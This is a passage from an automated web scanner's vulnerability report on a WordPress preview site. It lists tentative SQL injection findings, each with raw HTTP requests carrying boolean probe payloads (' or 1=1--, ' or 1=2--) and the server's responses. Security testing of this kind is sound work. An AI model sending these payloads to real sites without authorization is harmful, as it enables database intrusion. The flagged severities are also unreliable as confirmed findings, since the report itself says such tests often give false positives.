Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:52 GMT
Server: Apache
Content-Length: 284
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/plugins/google-analyticator/external-tracking.min.js47810127' or 1=1--
on this server.</p>
</body></html>

Request 2

GET /wp-content/plugins/google-analyticator/external-tracking.min.js47810127'%20or%201%3d2--%20 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 08:09:53 GMT
Server: Apache
Content-Length: 280
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /wp-content/plugins/google-analyticator/external-tracking.min.js47810127' or 1=2-- was not found on this server.</p>
</body></html>

1.11. http://alphanetsolutions.prontopreview.com/wp-content/plugins/google-analyticator/external-tracking.min.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/plugins/google-analyticator/external-tracking.min.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10190014%20or%201%3d1--%20 and 10190014%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/google-analyticator/external-tracking.min.js?ver=5.3.2&110190014%20or%201%3d1--%20=1 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:08:38 GMT
Server: Apache
Content-Length: 265
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/plugins/google-analyticator/external-tracking.min.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/plugins/google-analyticator/external-tracking.min.js?ver=5.3.2&110190014%20or%201%3d2--%20=1 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 08:08:38 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 00:02:15 GMT
ETag: "2c0580-39b-486fb4981cfc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Thu, 15 Nov 2010 20:00:00 GMT
Content-Type: application/x-javascript
Content-Length: 923

jQuery(document).ready(function(){jQuery('a').each(function(){var a=jQuery(this);var href=a.attr('href');if(href==undefined)
return;var url=href.replace('http://','').replace('https://','');var hrefArray=href.split('.').reverse();var extension=hrefArray[0].toLowerCase();var hrefArray=href.split('/').reverse();var domain=hrefArray[2];var downloadTracked=false;if(jQuery.inArray(extension,analyticsFileTypes)!=-1){downloadTracked=true;a.click(function(){if(analyticsEventTracking=='enabled'){pageTracker._trackEvent("Downloads",extension.toUpperCase(),href);}else
pageTracker._trackPageview(analyticsDownloadsPrefix+url);});}
if((href.match(/^http/))&&(!href.match(document.domain))&&(downloadTracked==false)){a.click(function(){if(analyticsEventTracking=='enabled'){pageTracker._trackEvent("Outbound Traffic",href.match(/:\/\/(.[^/]+)/)[1],href);}else
pageTracker._trackPageview(analyticsOutboundPrefix+url);});}});});

1.12. http://alphanetsolutions.prontopreview.com/wp-content/plugins/google-analyticator/external-tracking.min.js [ver parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/plugins/google-analyticator/external-tracking.min.js

Issue detail

The ver parameter appears to be vulnerable to SQL injection attacks. The payloads 77159545'%20or%201%3d1--%20 and 77159545'%20or%201%3d2--%20 were each submitted in the ver parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/google-analyticator/external-tracking.min.js?ver=5.3.277159545'%20or%201%3d1--%20 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:08:09 GMT
Server: Apache
Content-Length: 265
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/plugins/google-analyticator/external-tracking.min.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/plugins/google-analyticator/external-tracking.min.js?ver=5.3.277159545'%20or%201%3d2--%20 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 08:08:09 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 00:02:15 GMT
ETag: "2c0580-39b-486fb4981cfc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Thu, 15 Nov 2010 20:00:00 GMT
Content-Type: application/x-javascript
Content-Length: 923

jQuery(document).ready(function(){jQuery('a').each(function(){var a=jQuery(this);var href=a.attr('href');if(href==undefined)
return;var url=href.replace('http://','').replace('https://','');var hrefArray=href.split('.').reverse();var extension=hrefArray[0].toLowerCase();var hrefArray=href.split('/').reverse();var domain=hrefArray[2];var downloadTracked=false;if(jQuery.inArray(extension,analyticsFileTypes)!=-1){downloadTracked=true;a.click(function(){if(analyticsEventTracking=='enabled'){pageTracker._trackEvent("Downloads",extension.toUpperCase(),href);}else
pageTracker._trackPageview(analyticsDownloadsPrefix+url);});}
if((href.match(/^http/))&&(!href.match(document.domain))&&(downloadTracked==false)){a.click(function(){if(analyticsEventTracking=='enabled'){pageTracker._trackEvent("Outbound Traffic",href.match(/:\/\/(.[^/]+)/)[1],href);}else
pageTracker._trackPageview(analyticsOutboundPrefix+url);});}});});

1.13. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/default.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/themes/core/js/default.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13975774'%20or%201%3d1--%20 and 13975774'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content13975774'%20or%201%3d1--%20/themes/core/js/default.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:08:56 GMT
Server: Apache
Content-Length: 257
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content13975774' or 1=1-- /themes/core/js/default.js
on this server.</p>
</body></html>

Request 2

GET /wp-content13975774'%20or%201%3d2--%20/themes/core/js/default.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:08:56 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.14. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/default.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/themes/core/js/default.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 10100540'%20or%201%3d1--%20 and 10100540'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes10100540'%20or%201%3d1--%20/core/js/default.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:14 GMT
Server: Apache
Content-Length: 257
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/themes10100540' or 1=1-- /core/js/default.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/themes10100540'%20or%201%3d2--%20/core/js/default.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:09:14 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.15. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/default.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/themes/core/js/default.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13369791'%20or%201%3d1--%20 and 13369791'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes/core13369791'%20or%201%3d1--%20/js/default.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:23 GMT
Server: Apache
Content-Length: 257
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/themes/core13369791' or 1=1-- /js/default.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/themes/core13369791'%20or%201%3d2--%20/js/default.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:09:23 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.16. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/default.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/themes/core/js/default.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 60718099'%20or%201%3d1--%20 and 60718099'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes/core/js60718099'%20or%201%3d1--%20/default.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:32 GMT
Server: Apache
Content-Length: 257
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/themes/core/js60718099' or 1=1-- /default.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/themes/core/js60718099'%20or%201%3d2--%20/default.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:09:32 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.17. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/default.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/themes/core/js/default.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads 30148638'%20or%201%3d1--%20 and 30148638'%20or%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes/core/js/default.js30148638'%20or%201%3d1--%20 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:42 GMT
Server: Apache
Content-Length: 257
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/themes/core/js/default.js30148638' or 1=1--
on this server.</p>
</body></html>

Request 2

GET /wp-content/themes/core/js/default.js30148638'%20or%201%3d2--%20 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 08:09:42 GMT
Server: Apache
Content-Length: 253
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /wp-content/themes/core/js/default.js30148638' or 1=2-- was not found on this server.</p>
</body></html>

1.18. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/default.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/themes/core/js/default.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11103956%20or%201%3d1--%20 and 11103956%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes/core/js/default.js?111103956%20or%201%3d1--%20=1 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:08:09 GMT
Server: Apache
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/themes/core/js/default.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/themes/core/js/default.js?111103956%20or%201%3d2--%20=1 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 08:08:09 GMT
Server: Apache
Last-Modified: Thu, 19 Aug 2010 11:48:28 GMT
ETag: "3102a6-515-48e2bc2b19b00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Thu, 15 Nov 2010 20:00:00 GMT
Content-Type: application/x-javascript
Content-Length: 1301

jQuery(document).ready(function() {
   // Last two widgets needed to have special class
   var footerWidgets = jQuery(".footerwidget");
   var noFooterWidgets = footerWidgets.length;
   var indexLastTwo = noFooterWidgets-3;
   jQuery(".footerwidget:first-child").addClass('first');
   jQuery(".footerwidget:gt("+indexLastTwo+")").addClass('lineup');
   
   // Auto divide widget width based on the number of widgets minus two
   var curWidth=jQuery("#footer_widgets").css('width');
   var indexBeforeLastTwo = noFooterWidgets-2;
   var boxWidth = parseInt(curWidth)/parseInt(indexBeforeLastTwo);
   
   jQuery(".footerwidget:lt("+indexBeforeLastTwo+")").css("width",boxWidth-subTract)
   
   // Auto Height the footer
   var tallest = 0;
   jQuery.each(footerWidgets, function(i, val) {
var height = val.offsetHeight;
    if(height>tallest){
       tallest = height;
    }
    return (i!=indexLastTwo);
});
   
   jQuery(".footerwidget:lt("+indexBeforeLastTwo+")").css("height",tallest+20);
   
   // Last Item on Blog Nav no border line
   jQuery(".widget_authors ul li:last-child").addClass('last');
   // Last icon multi on hp secondaray widget area has no bottom divider
   jQuery("#hp_secondary_widgets .icon_multi:last-child").addClass('last');
   
   jQuery(".cat-item:last-child").addClass('last');

});    

1.19. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/jquery.cycle.all.2.72.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/themes/core/js/jquery.cycle.all.2.72.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 42360442'%20or%201%3d1--%20 and 42360442'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content42360442'%20or%201%3d1--%20/themes/core/js/jquery.cycle.all.2.72.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:08:59 GMT
Server: Apache
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content42360442' or 1=1-- /themes/core/js/jquery.cycle.all.2.72.js
on this server.</p>
</body></html>

Request 2

GET /wp-content42360442'%20or%201%3d2--%20/themes/core/js/jquery.cycle.all.2.72.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:08:59 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.20. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/jquery.cycle.all.2.72.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/themes/core/js/jquery.cycle.all.2.72.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 15635519'%20or%201%3d1--%20 and 15635519'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes15635519'%20or%201%3d1--%20/core/js/jquery.cycle.all.2.72.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:18 GMT
Server: Apache
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
